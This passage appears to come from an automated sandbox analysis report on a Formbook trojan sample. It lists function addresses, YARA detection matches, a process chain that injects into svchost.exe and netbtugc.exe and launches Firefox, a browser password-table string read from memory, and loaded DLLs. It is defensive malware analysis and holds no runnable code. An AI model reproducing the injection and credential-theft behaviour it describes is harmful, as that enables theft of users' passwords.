            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00C070E9, 2_2_00C070E9
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00BFF0CC, 2_2_00BFF0CC
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B570C0, 2_2_00B570C0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B5B1B0, 2_2_00B5B1B0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00C1B16B, 2_2_00C1B16B
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B3F172, 2_2_00B3F172
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B8516C, 2_2_00B8516C
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B552A0, 2_2_00B552A0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00BF12ED, 2_2_00BF12ED
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B6B2C0, 2_2_00B6B2C0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B9739A, 2_2_00B9739A
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00C0132D, 2_2_00C0132D
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B3D34C, 2_2_00B3D34C
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B41460, 2_2_00B41460
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00C0F43F, 2_2_00C0F43F
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00C195C3, 2_2_00C195C3
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00BED5B0, 2_2_00BED5B0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00C07571, 2_2_00C07571
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00C016CC, 2_2_00C016CC
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B95630, 2_2_00B95630
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00C0F7B0, 2_2_00C0F7B0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B538E0, 2_2_00B538E0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00BBD800, 2_2_00BBD800
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00BE5910, 2_2_00BE5910
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B59950, 2_2_00B59950
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B6B950, 2_2_00B6B950
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00BEDAAC, 2_2_00BEDAAC
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B95AA0, 2_2_00B95AA0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00BF1AA3, 2_2_00BF1AA3
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00BFDAC6, 2_2_00BFDAC6
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00C07A46, 2_2_00C07A46
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00C0FA49, 2_2_00C0FA49
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00BC3A6C, 2_2_00BC3A6C
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B6FB80, 2_2_00B6FB80
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B8DBF9, 2_2_00B8DBF9
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00BC5BF0, 2_2_00BC5BF0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00C0FB76, 2_2_00C0FB76
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00C0FCF2, 2_2_00C0FCF2
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00BC9C32, 2_2_00BC9C32
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B6FDC0, 2_2_00B6FDC0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00C01D5A, 2_2_00C01D5A
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00C07D73, 2_2_00C07D73
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B53D40, 2_2_00B53D40
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B59EB0, 2_2_00B59EB0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B51F92, 2_2_00B51F92
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B13FD2, 2_2_00B13FD2
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B13FD5, 2_2_00B13FD5
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00C0FFB1, 2_2_00C0FFB1
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00C0FF09, 2_2_00C0FF09
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_03A003E6, 6_2_03A003E6
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_0394E3F0, 6_2_0394E3F0
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_039FA352, 6_2_039FA352
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_039C02C0, 6_2_039C02C0
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_039E0274, 6_2_039E0274
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_03A001AA, 6_2_03A001AA
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_039F81CC, 6_2_039F81CC
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_039DA118, 6_2_039DA118
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_03930100, 6_2_03930100
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_039C8158, 6_2_039C8158
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_039D2000, 6_2_039D2000
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_0393C7C0, 6_2_0393C7C0
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_03964750, 6_2_03964750
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_03940770, 6_2_03940770
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_0395C6E0, 6_2_0395C6E0
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_03A00591, 6_2_03A00591
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_03940535, 6_2_03940535
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_039EE4F6, 6_2_039EE4F6
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_039E4420, 6_2_039E4420
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_039F2446, 6_2_039F2446
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_039F6BD7, 6_2_039F6BD7
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_039FAB40, 6_2_039FAB40
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_0393EA80, 6_2_0393EA80
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_03A0A9A6, 6_2_03A0A9A6
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_039429A0, 6_2_039429A0
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_03956962, 6_2_03956962
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_039268B8, 6_2_039268B8
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_0396E8F0, 6_2_0396E8F0
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_0394A840, 6_2_0394A840
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_03942840, 6_2_03942840
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_039BEFA0, 6_2_039BEFA0
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_03932FC8, 6_2_03932FC8
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_0394CFE0, 6_2_0394CFE0
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_03960F30, 6_2_03960F30
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_039E2F30, 6_2_039E2F30
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_03982F28, 6_2_03982F28
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_039B4F40, 6_2_039B4F40
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_03952E90, 6_2_03952E90
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_039FCE93, 6_2_039FCE93
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_039FEEDB, 6_2_039FEEDB
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_039FEE26, 6_2_039FEE26
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_03940E59, 6_2_03940E59
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_03958DBF, 6_2_03958DBF
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_0393ADE0, 6_2_0393ADE0
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_039DCD1F, 6_2_039DCD1F
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_0394AD00, 6_2_0394AD00
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_039E0CB5, 6_2_039E0CB5
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_03930CF2, 6_2_03930CF2
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_03940C00, 6_2_03940C00
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_0398739A, 6_2_0398739A
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_039F132D, 6_2_039F132D
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_0392D34C, 6_2_0392D34C
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_039452A0, 6_2_039452A0
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_0395B2C0, 6_2_0395B2C0
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_039E12ED, 6_2_039E12ED
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_0394B1B0, 6_2_0394B1B0
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_03A0B16B, 6_2_03A0B16B
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_0392F172, 6_2_0392F172
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_0397516C, 6_2_0397516C
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_039EF0CC, 6_2_039EF0CC
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_039470C0, 6_2_039470C0
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_039F70E9, 6_2_039F70E9
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_039FF0E0, 6_2_039FF0E0
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_039FF7B0, 6_2_039FF7B0
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_039F16CC, 6_2_039F16CC
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_039DD5B0, 6_2_039DD5B0
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_039F7571, 6_2_039F7571
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_039FF43F, 6_2_039FF43F
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_03931460, 6_2_03931460
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_0395FB80, 6_2_0395FB80
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_039B5BF0, 6_2_039B5BF0
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_0397DBF9, 6_2_0397DBF9
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_039FFB76, 6_2_039FFB76
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_039DDAAC, 6_2_039DDAAC
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_03985AA0, 6_2_03985AA0
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_039E1AA3, 6_2_039E1AA3
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_039EDAC6, 6_2_039EDAC6
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_039FFA49, 6_2_039FFA49
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_039F7A46, 6_2_039F7A46
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_039B3A6C, 6_2_039B3A6C
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_039D5910, 6_2_039D5910
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_03949950, 6_2_03949950
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_0395B950, 6_2_0395B950
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_039438E0, 6_2_039438E0
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_039AD800, 6_2_039AD800
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_03941F92, 6_2_03941F92
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_039FFFB1, 6_2_039FFFB1
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_039FFF09, 6_2_039FFF09
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_03949EB0, 6_2_03949EB0
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_0395FDC0, 6_2_0395FDC0
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_039F1D5A, 6_2_039F1D5A
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_03943D40, 6_2_03943D40
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_039F7D73, 6_2_039F7D73
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_039FFCF2, 6_2_039FFCF2
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_039B9C32, 6_2_039B9C32
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_03211810, 6_2_03211810
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_032130A0, 6_2_032130A0
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_0321309B, 6_2_0321309B
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_0320C760, 6_2_0320C760
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_0322B420, 6_2_0322B420
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0320AA006_2_0320AA00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0320C9806_2_0320C980
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03214EC06_2_03214EC0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0381E2E86_2_0381E2E8
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0381E7A86_2_0381E7A8
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0381E4036_2_0381E403
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0381D8086_2_0381D808
            Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 00B97E54 appears 111 times
            Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 00B85130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 00BBEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 00BCF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 00B3B970 appears 280 times
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: String function: 039BF290 appears 105 times
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: String function: 0392B970 appears 278 times
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: String function: 03975130 appears 58 times
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: String function: 039AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: String function: 03987E54 appears 102 times
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe Code function: String function: 0009F885 appears 68 times
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe Code function: String function: 000A7750 appears 42 times
            Source: r3T-ENQ-O-2024-10856.exe, 00000000.00000003.2088784839.0000000003FFD000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs r3T-ENQ-O-2024-10856.exe
            Source: r3T-ENQ-O-2024-10856.exe, 00000000.00000003.2086388303.0000000003E03000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs r3T-ENQ-O-2024-10856.exe
            Source: r3T-ENQ-O-2024-10856.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.380000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.380000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2584333644.0000000003160000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3345963921.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3347470009.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3347537099.0000000003710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2583640738.0000000000380000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.3347630657.00000000035F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.3347309941.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2584390096.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/3@13/4
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe Code function: 0_2_000CD712 GetLastError,FormatMessageW
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe Code function: 0_2_000BB8B0 AdjustTokenPrivileges,CloseHandle
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe Code function: 0_2_000BBEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe Code function: 0_2_000CEA85 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe Code function: 0_2_000C6F5B CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe Code function: 0_2_000DC604 CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe Code function: 0_2_000831F2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe File created: C:\Users\user\AppData\Local\Temp\aut1F71.tmp
            Source: r3T-ENQ-O-2024-10856.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe File read: C:\Users\desktop.ini
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: netbtugc.exe, 00000006.00000003.2829715517.0000000003427000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.3346397218.0000000003427000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.3346397218.0000000003454000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.3346397218.0000000003430000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: r3T-ENQ-O-2024-10856.exe ReversingLabs: Detection: 26%
            Source: unknown Process created: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe "C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe"
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe"
            Source: C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exe Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
            Source: C:\Windows\SysWOW64\netbtugc.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe Section loaded: wsock32.dll
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe Section loaded: version.dll
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe Section loaded: winmm.dll
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe Section loaded: mpr.dll
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe Section loaded: propsys.dll
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe Section loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: version.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: mlang.dll
